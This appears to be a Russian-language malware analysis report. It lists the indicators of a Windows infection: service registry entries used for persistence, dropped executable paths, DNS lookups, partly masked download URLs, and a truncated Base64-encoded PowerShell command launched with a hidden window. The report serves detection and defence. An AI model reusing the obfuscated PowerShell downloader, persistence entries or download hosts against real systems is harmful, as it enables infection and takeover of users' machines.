Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\cmicryptinstall] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\cmicryptinstall] 'ImagePath' = '"%WINDIR%\SysWOW64\ndadmin\cmicryptinstall.exe"'
- 'cmicryptinstall' "%WINDIR%\SysWOW64\ndadmin\cmicryptinstall.exe"
- 'cmicryptinstall' %WINDIR%\SysWOW64\ndadmin\cmicryptinstall.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABYADIAeABkAHAAZgBjAD0AKAAnAFUAJwArACgAJwBkAGQAJwArACcAdAB1AGYAJwArACcAMAAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAcgBwAFIATwBGAEkATABFAFwARgAwAFkAVQAwA...
- %HOMEPATH%\f0yu0bk\ufwi3mb\exhr7qlf.exe
- %WINDIR%\syswow64\ndadmin\cmicryptinstall.exe
- %HOMEPATH%\f0yu0bk\ufwi3mb\exhr7qlf.exe в %WINDIR%\syswow64\ndadmin\cmicryptinstall.exe
- '19#.#91.171.72':80
- http://ne####ertafrica.com/wp-admin/J/
- http://19#.#91.171.72/PBM0NGM8VTzrj0jK/nofGrs8NPNCXxJzBsHd/5czvSi3C/RB7nL/1y3Y0cFUWDybvcnyr/
- DNS ASK ex####eproperti.com
- DNS ASK ne####ertafrica.com
- '%HOMEPATH%\f0yu0bk\ufwi3mb\exhr7qlf.exe'
- '%WINDIR%\syswow64\ndadmin\cmicryptinstall.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABYADIAeABkAHAAZgBjAD0AKAAnAFUAJwArACgAJwBkAGQAJwArACcAdAB1AGYAJwArACcAMAAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBTAEUAcgBwAFIATwBGAEkATABFAFwARgAwAFkAVQAwA...' (со скрытым окном)